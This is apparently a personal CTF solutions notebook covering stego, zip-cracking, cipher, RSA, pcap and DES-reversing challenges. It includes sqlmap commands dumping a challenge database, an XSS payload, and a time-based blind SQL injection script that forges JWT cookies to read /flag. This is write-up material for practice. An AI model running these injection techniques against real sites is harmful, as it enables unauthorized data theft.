bkcrack -C flag.zip -c README.txt -p README.txt
bkcrack -C flag.zip -c flag.jpg -k 060fd5e1 d1f696b7 12655d8d -d flag =>生产flag图片
binwalk flag =>发现有zip
binwalk -e flag =>提出4FC5.zip
imhex 4FC5.zip =>用imhex清除伪密码 14 00 09 改为14 00 00
unzip 4FC5.zip =>可以看到flag

lsbHacking

#solution1
java -jar Stegsolve.jar
open image
data analis
select 0
and save bin flag.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
#solution2
zsteg flag11.png
zsteg flag11.png -E b1,rgb,lsb,xy > flag1.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode

眼见非实

mv zip z.zip
unzip z.zip
binwalk -e 眼见非实.docx
mv 眼见非实.docx yan.zip
unzip yan.zip
open extreated folder with code search flag

T0p_Gear

https://www.cnblogs.com/ms-study/p/13201030.html

#@ add user for archlinux WSL and login

wsl.exe -d Arch login
user_name:andrew
password:dnr..
# open /etc/sudoers add that
nano /etc/sudoers
andrew ALL=(ALL) ALL

use steghide

#显示信息
steghide info demo.png
zsteg -a demo.png

这是类

#  strings AppletMain.class
s = "\u0066\u006c\u0061\u0067\u007b\u0033\u0034\u0038\u0034\u0066\u0038\u0033\u0061\u002d\u0066\u0062\u0035\u0033\u002d\u0034\u0062\u0038\u0031\u002d\u0061\u0033\u0061\u0037\u002d\u0064\u0038\u0062\u0064\u0031\u0039\u0032\u0036\u0036\u0062\u0062\u0033\u007d"
decoded_s = bytes(s, "utf-8").decode("unicode_escape")
print(decoded_s)
# flag{3484f83a-fb53-4b81-a3a7-d8bd19266bb3}

我藏起来了

css_remove_display_none
zsteg im.png
flag{72a8c48e-5bb0-40ef-b3f0-5543c3b16dfd}

gif提取隐藏信息

convert new_gif.gif -coalesce xx_%05d.png
一个一个看形成的图片能够得到flag

棋盘密码,上古神器

“波利比奥斯棋盘”
“3534315412244543_434145114215_132435231542”

https://www.qqxiuzi.cn/bianma/qipanmima.php

flow_analysis

#convert pcapng to pcap
tshark -F pcap -r ctf.pcapng -w newfile.pcap

getsqlinjection.py

import urllib
import pyshark
cap_file = '/run/media/andrew/HIKVISION/CTF/ichunqiu_ctf/flow_analysis/ctf.pcapng'
cap = pyshark.FileCapture(cap_file, display_filter='http  && ip.addr == 192.168.61.140 && ip.addr == 192.168.61.1')
is_http_request = 'is_http_request'
http_request = []
blind_attack_success = []
for i in range(len([_ for _ in cap])):
check = getattr(cap[i].http, 'time', is_http_request)
if check != is_http_request:
if float(cap[i].http.time) > 3:
for j in range(i, 0, -1):
if cap[j].frame_info.number == cap[i].http.request_in:
http_request.append((cap[j].frame_info.number, cap[j]))
http_request.append((cap[i].frame_info.number, cap[i]))
blind_attack_success.append(urllib.parse.unquote(cap[j].http.file_data))
print(cap[j].frame_info.number)
print(cap[j])
print(urllib.parse.unquote(cap[j].http.file_data))
# input()
print("----")
print(cap[i].frame_info.number)
print(cap[i])
print("----"*3)
break
with open('output.txt', 'w') as f:
f.writelines('\n'.join(blind_attack_success))

getasciicode.py

file_path = 'output.txt'
with open(file_path, 'r') as f:
lines = f.readlines()
ascii_digits = [ _.split('=')[2].split(',')[0] for _ in lines]
ascii_letters = ''.join([chr(int(_)) for _ in ascii_digits])
print(ascii_letters)

New Swan Stone Castle

sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23"
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" --current-db
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 --tables
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password --columns
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C id --dump
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C pwd --dump

万国码

file:///usr/share/webapps/cyberchef/index.html#recipe=Unescape_Unicode_Characters('%5C%5Cu')
decode unicode "\u0049\u0063\u0068\u0075\u006e\u0071\u0069\u0075\u007a\u006e\u007a\u006c"
enter value get flag

考考小李

'><script>alert(xx)</script>
把上面的提交能够得到flag
flag{608837f4-bbc5-464c-99ab-7b44016d1ee9}

回旋13踢

xw4n73qm23z rot13
enter value get flag

隐藏的编码

adslkjadsl a ,zmxnc,zmc,zxcopaweqwk;l;l;l;l;l;l;l;l;l;l;l;ldkm,ZGY1czRh==.zxmczxkchzxkhiqewupipsad;l;l;l;l;l;l;l;l;l;l;l;l
base64 -d ZGY1czRh==
enter value get flag

致敬经典

#![allow(unused)]
fn main() {
//看图片应该是凯撒加密 分析秘钥发现有偏移6,ASCII code 为偶数时右偏移6,奇数时左偏移6
fn caesar_cipher_decode_uniqe(text: &str, shift: u32) -> String {
println!("{}",text);
let mut result = String::new();
for c in text.chars() {
match c {
'a'..='z' => {
let mut ascii_code = c as u8;
if ascii_code %2 !=0{
ascii_code+=6;
}else{
ascii_code-=6;
}
if ascii_code>'z' as u8{
ascii_code = ascii_code - ('z' as u8)+('a' as u8)-1;
}
result.push((ascii_code) as char);
}
'A'..='Z' => {
let mut ascii_code = c as u8;
if ascii_code %2 !=0{
ascii_code+=6;
}else{
ascii_code-=6;
}
if ascii_code>'Z' as u8{
ascii_code = ascii_code - ('Z' as u8)+('A' as u8)-1;
}
result.push((ascii_code) as char);
}
_ => result.push(c),
}
}
println!("{}",result);
result
}
caesar_cipher_decode_uniqe("lrua{1uy3yj9l-yw9u-48j2-uuj8-36h03706y7u7}",6);
}

xor 签到题

fn main() {
let file = include_bytes!("xor GAME.txt").to_vec();
let key = "GAME".as_bytes().iter().map(|s|s.to_owned()).collect::<Vec<u8>>();
let new_file = xor(file,key);
println!("{}",String::from_utf8_lossy(&new_file));
}
fn xor(vec:Vec<u8>,key:Vec<u8>)->Vec<u8>{
let mut new_file = vec![];
for f in 0..vec.len(){
let ff= vec.get(f).unwrap()^key.get(f%key.len()).unwrap();
new_file.push(ff);
}
new_file
}
with open("xor GAME.txt","r") as f:
bytes = f.read()
game = "GAME"
flag = []
for i in range(len(bytes)):
new_b = ord(str(bytes[i]).encode('utf-8')) ^ ord(game[i%len(game)].encode('utf-8'))
flag.append(chr(new_b))
print("".join(flag))

CryMisc

import pyminizip
pyminizip.compress(r"jiami.py","",r"jiami.zip","",0)
#用AZPR明文破解
AESencrypt.py 可以得到
n = int("48D6B5DAB6617F21B39AB2F7B14969A7337247CABB417B900AE1D986DB47D971",16)=32945885482421841602167475970472000545315534895409154025267147105384142461297
factordb 32945885482421841602167475970472000545315534895409154025267147105384142461297
import gmpy2
import rsa
n = 32945885482421841602167475970472000545315534895409154025267147105384142461297
p = 177334994338425644535647498913444186659
q = 185783328357334813222812664416930395483
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./message.encrypted", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))

PINTU

from PIL import Image
import os
# create a new image size of 4000x2000 pixels and black background
pic = Image.new('RGB',(4000,2000),(0,0,0))
# list all image files
img_list = os.listdir('./img')
for i in range(len(img_list)):
print("./img/{}".format(img_list[i]))
# read image and reads the width and height of the image from the file header
f = open(f'./img/{img_list[i]}','rb').read()
w,h = f[6],f[8]
img = Image.open(f'./img/{img_list[i]}')
# create image with 32 columns and 18 rows
pic.paste(img,(32*w,18*h))
pic.save("all_image.png")

tiger

cat png-key.txt | rot47 decode
conda activate py27
python lsb.py extract key.png-stego.png gen.txt 28a217fe
cat gen.txt
unzip -Z flag_1.zip
bkcrack -C flag_1.zip -c information.txt.txt -p information.txt.txt
bkcrack -C flag_1.zip -c flag -k 968eae79 e129f7a6 43893e7a -d flag
qrcli decode flag.png > zero.txt
https://yuanfux.github.io/zero-width-web/ decode content
Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!
https://www.guballa.de/vigenere-solver decode vigenere
flag{866d3755-c358-5119-abeb-bda666a8099d}

外太空的秘密

print("q1:{}".format(pow(9,9)))
s=['A','C','G','T','R','N','D','E','G']
cnt=0
for i in range(9):
for j in range(9):
for k in range(9):
for m in range(9):
for n in range(9):
for o in range(9):
for p in range(9):
for q in range(9):
for r in range(9):
_str=s[i]+s[j]+s[k]+s[m]+s[n]+s[o]+s[p]+s[q]+s[r]
cnt+=1
if _str=='AAAARNDEG':
print("q2:{}".format(cnt))
if cnt==1001:
print("q3:{}".format(_str))

rsa256

openssl rsa -pubin -in public.key -text -modulus
e = 65537
int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
factordb 87982816287542607821348020319142008042005562918106976160430773236821410039557
p=274473488606178722897600533120866465659 q=320551236967671239609994506214257226623
import gmpy2
import rsa
n = int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
p = 274473488606178722897600533120866465659
q = 320551236967671239609994506214257226623
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./message.encrypted", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))

ziji

# python2 decomress_zlib.py
# file:///usr/share/webapps/cyberchef/index.html#recipe=From_Hex('None')
# get 1111111000100001101...
# 用01画图1的话(0,0,0),0的话(255,255,255)
# decomress_zlib.py
# 解压zlib
import zlib
import binascii
idat ="789C5D91011280400802BF04FFFF5C75294B5537738A21A27D1E49CFD17DB3937A92E7E603880A6D485100901FB0410153350DE83112EA2D51C54CE2E585B15A2FC78E8872F51C6FC1881882F93D372DEF78E665B0C36C529622A0A45588138833A170A2071DDCD18219DB8C0D465D8B6989719645ED9C11C36AE3ABDAEFCFC0ACF023E77C17C7897667".decode("hex")
result = binascii.hexlify(zlib.decompress(idat))
print(result)
# draw_img.py
# 像素画图
from PIL import Image
import os
import math
# 用01画图1的话(0,0,0),0的话(255,255,255)
bins = "1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011"
size = int(math.sqrt(len(bins)))
# create a new image size of size*size pixels and black background
pic = Image.new('RGB',(100,100),(0,0,0))
index = 0
for i in range(size):
for j in range(size):
if bins[index]=="0":
pic.putpixel([j,i],(255,255,255))
index+=1
pic.save("all_image.png")

Xor很心疼你

#***Task
# Python3
from secret import flag
import random
import base64
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
r = random.randint(2, 250)
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
random.seed(x)
return random.getrandbits(8)
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for _ in range(20):
key = f(key)
assert key != 0
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return base64.b64encode(plaintext)
m = generate(random.randint(200, 300)) + flag + generate(random.randint(200, 300))
c = encrypt(m, random.getrandbits(128))
print(c)
# b'8OcTbAfL6/kOMQnC9v8SNmmSzvQMeGTT8vANM1T+7vIce2fo0fc2RnScrNxTSmeSyuMjMF//w8BWaXX91dsGcnvmreg0NQTw96ceVVXj3sQ3Znn51OU1S0bOyaMtNHTj36AcWFqewN4zRUXD6agGbAPE+tQtd3XG0doAa1Ll9fhcQ1zk0McTM1bv8PIQOAnn3vQ3UgLD3PsONXLs4KkXMnjTyMEQOFn/0uYVUwOY1PsleEHCyNopRVDr+Kc0e2PH9v0XNXfprfIPU3nw7KYTNX/G7twLSkHoyaUlQHXi3v02UHmdy/4iNgme3Pc8bgPp+tYWV1+YzPkXYkXM4ulUc27DrM4SNUPT2fQlckj1qP4Fal+YoPYJMlyZ8qhXfF3Y0tUDdUXl3vg0dFTi++VVOFfH/dgMS1ru9N8WU0HF9cUCTgPe+qVdSn/u7Mkda0GTw/QDcWPZ9KYGN2jSzfk0OVrMzt0yRHD64KMrUgPF2sFWcmP56KZSTAD61PUGeXrd49MgU1bL8OsVNWj91vIsalXwqf0qaWbwzv0lWETA4eElS3L99cYmU1nv9dRQTWbDyclScQTN6NIhV2j//+ZWbH7Z68kwM3Dy4dcUc1PQy8kRTl/4zcU9WGWfoakOMXuf69MXZQTEz+kJT1Dar8UN'
#***Solution
# Python3
import random
import base64
cc=b'8OcTbAfL6/kOMQnC9v8SNmmSzvQMeGTT8vANM1T+7vIce2fo0fc2RnScrNxTSmeSyuMjMF//w8BWaXX91dsGcnvmreg0NQTw96ceVVXj3sQ3Znn51OU1S0bOyaMtNHTj36AcWFqewN4zRUXD6agGbAPE+tQtd3XG0doAa1Ll9fhcQ1zk0McTM1bv8PIQOAnn3vQ3UgLD3PsONXLs4KkXMnjTyMEQOFn/0uYVUwOY1PsleEHCyNopRVDr+Kc0e2PH9v0XNXfprfIPU3nw7KYTNX/G7twLSkHoyaUlQHXi3v02UHmdy/4iNgme3Pc8bgPp+tYWV1+YzPkXYkXM4ulUc27DrM4SNUPT2fQlckj1qP4Fal+YoPYJMlyZ8qhXfF3Y0tUDdUXl3vg0dFTi++VVOFfH/dgMS1ru9N8WU0HF9cUCTgPe+qVdSn/u7Mkda0GTw/QDcWPZ9KYGN2jSzfk0OVrMzt0yRHD64KMrUgPF2sFWcmP56KZSTAD61PUGeXrd49MgU1bL8OsVNWj91vIsalXwqf0qaWbwzv0lWETA4eElS3L99cYmU1nv9dRQTWbDyclScQTN6NIhV2j//+ZWbH7Z68kwM3Dy4dcUc1PQy8kRTl/4zcU9WGWfoakOMXuf69MXZQTEz+kJT1Dar8UN'
cc=base64.b64decode(cc)
flag = 'hsctf{'
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
random.seed(x)
return random.getrandbits(8)
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
#assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return plaintext
def decrypt(ciphertext, key):
ciphertext=list(ciphertext)
for i in range(len(ciphertext)):
key = f(key)
tmp = (key * r) % 251
ciphertext[i] = ciphertext[i] ^ tmp
ciphertext = bytes(ciphertext)
return ciphertext
for r in range(2,251):
for key in range(1,256):
m = flag
c = encrypt(m, key)
if(c in cc):
print(r)
print(key)
print(c)
print(cc.index(c))
r=187
key=34
pos=247
mm=decrypt(cc[247:],key)
print(mm)

晋升之路

###################Solution
import requests
import time
import json
import hmac
import hashlib
import base64
import urllib
header = {
"alg": "SHA256",
"typ": "JWT",
}
secret_key = 'keyfe7dc29e5e3d3f066e5a8a15ba135259'
def b64_encode(s):
return base64.b64encode(s)
def b64_decode(s):
return base64.b64decode(s)
def encode_(secret, header, payload):
header_json = json.dumps(header,separators=(',', ':'), sort_keys=True)
segments = []
segments.append(b64_encode(header_json))
segments.append(b64_encode(payload))
msg = '.'.join(segments)
hm = hmac.new(secret, msg, digestmod=hashlib.sha256)
hm_base64 = b64_encode(hm.digest())
segments.append(hm_base64)
token = '.'.join(segments)
return token
def change(source):
to=''
for c in source:
to+='\u00'+hex(ord(c))[2:]
return to
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
url='http://eci-2ze1tsbvbckimbhvrqqu.cloudeci1.ichunqiu.com:80/'
flag=''
for i in range(1,50):
left=33
right=128
while right-left!=1:
mid=(left+right)/2
payload="'^(substr((select/**/binary/**/load_file(0x2f666c6167)),{i},1)>binary/**/{mid})/**/and/**/sleep(2)^'".format(i=i,mid=hex(mid))
data='{"data":"0'+change(payload)+'"}'
cookies={
'BestScore':urllib.quote(encode_(secret_key,header,data)),
'CellState':'eyJhbGciOiJTSEEyNTYiLCJ0eXAiOiJKV1QifQ%3D%3D.eyJkYXRhIjoie1wic2NvcmVcIjozNixcImdyaWRcIjp7XCJzaXplXCI6NCxcImNlbGxzXCI6W1t7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQMlwifV0sW3tcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjB9LFwidmFsdWVcIjpcIlAzXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjF9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjJ9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjN9LFwidmFsdWVcIjpcIlAxXCJ9XSxbe1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MH0sXCJ2YWx1ZVwiOlwiUDJcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MX0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6Mn0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6M30sXCJ2YWx1ZVwiOlwiUDJcIn1dLFt7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQM1wifV1dfX0ifQ%3D%3D.N5Z2xi2%2F64lMHNC81TDUZUS2EIlizpCNcFG3p78WOAQ%3D'
}
mid=(left+right)/2
t1=time.time()
requests.get(url,headers=headers,cookies=cookies)
t2=time.time()
if t2-t1 >1:
left=mid
else:
right=mid
print left,right
flag+=chr(right)
print flag
#python2 jinsheng.py

WuHen

分析,程序主动去触发divzero异常,说明有东西隐藏在异常。通过seh去找 start() -> scrt_common_main_seh() -> initterm((_PVFV *)&First, (_PVFV *)&Last); -> 进到First -> sub_7FF781AC1000 -> 7FF781AC2390 发现这里是一个DES算法。rand()是固定

else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
{
v8 = 0;
*(_QWORD *)(a1[1] + 72) = 0i64;
qmemcpy(S1, "鏷-%嫋", 8);
*(_DWORD *)&S1[12] = 0xD8A5EDAC;
*(_DWORD *)&S1[16] = 0x23E71CCB;
*(_DWORD *)&S1[20] = 0x169DDCDA;
*(_DWORD *)&S1[24] = 0x2DFE7A0;
*(_DWORD *)&S1[28] = 0x40CA83C;             // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
KEY[0] = rand();
KEY[1] = rand();
KEY[2] = rand();
KEY[3] = rand();
KEY[4] = rand();
KEY[5] = rand();
KEY[6] = rand();
KEY[7] = rand();
ka = *(_QWORD *)KEY;                        // 2923BE84E16CD6AE
for ( i = 0i64; i != 32; i += 8i64 )
*(_QWORD *)&In1[i] = Des(*(_QWORD *)&In1[i], ka);
for ( j = 0i64; j != 32; ++j )
{
if ( In1[j] != S1[j] )
break;
++v8;
}
if ( v8 == 32 )
*(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
return 0xFFFFFFFFi64;
}

经过超级长的时间调试找到魔改点在循环左移处,改成了左移2,而且这个是小端的传值,都是反向处理一下。

for j in range(step):
t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
==> main.py <==
from des import Decryption
key = bytes.fromhex('2923BE84E16CD6AE')[::-1]
enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
enc = bytes.fromhex(enclist[i:i + 16])[::-1]
res = Decryption(enc, key)
print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==> CreateSubkey.py <==
MaxTime = 16
# 生成子密钥的置换表1,将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2,将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8,
16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55,
30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53,
46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)
def Listmove(l, step):  # 将列表中的元素循环左移
return l[step:] + l[:step]
def Subkey(key):  # 生成子密钥
keyresult = []
key0 = [0 for i in range(56)]
for i in range(len(key_table1)):
key0[i] = key[key_table1[i] - 1]
# 生成16个密钥
for i in range(MaxTime):
key1 = [0 for i in range(48)]
# 确定每次左移的步数
step = STEP_TABLE[i]
# if (i == 0 or i == 1 or i == 8 or i == 15):
#     step = 1
# else:
#     step = 2
# 分成两组
tmp1 = key0[0:28]
tmp2 = key0[28:56]
# print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
# 循环左移
# tmp1 = Listmove(tmp1, step)
# tmp2 = Listmove(tmp2, step)
for j in range(step):
t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
tmp1 = list(f'{t1:028b}')
tmp2 = list(f'{t2:028b}')
# tmp1 = Listmove(tmp1, step*2)
# tmp2 = Listmove(tmp2, step*2)
# 左右连接
key0 = tmp1 + tmp2
# 置换选择
for j in range(len(key_table2)):
key1[j] = key0[key_table2[j] - 1]
# 生成密钥
# log(i, key1, tmp1, tmp2)
keyresult.append(key1)
# 返回的是一个集合包含了每次的密钥
return keyresult
def log(i, key1, tmp1, tmp2):
s = int(''.join(tmp1), 2)
hex1 =int(''.join(tmp2), 2)
hex2 = int(''.join(key1), 2)
print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')
==> des.py <==
import CreateSubkey as cs
import F_function as f
# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f"{x:08b}"]
# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])
# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
text = Hex2bin(plaintext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0)  # IP置换
L = text1[:32]
R = text1[32:64]
for i in range(16):
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[i])
# print('xor:', hex(int(''.join(tmp), 2)))
tmp = f.S_replace(tmp)
# print('S:', hex(int(''.join(tmp), 2)))
tmp = f.P_replace(tmp)
# print('P:', hex(int(''.join(tmp), 2)))
tmp = f.Xor(tmp, L)
# print('pres ^ L:', hex(int(''.join(tmp), 2)))
L = R
R = tmp
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
def Decryption(ptext, key):
text = Hex2bin(ptext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0)  # IP置换
L = [text1[i] for i in range(32)]
R = [text1[i] for i in range(32, 64)]
for i in range(16):
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[15 - i])
tmp = f.S_replace(tmp)
tmp = f.P_replace(tmp)
tmp = f.Xor(tmp, L)
L = R
R = tmp
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
==> F_function.py <==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
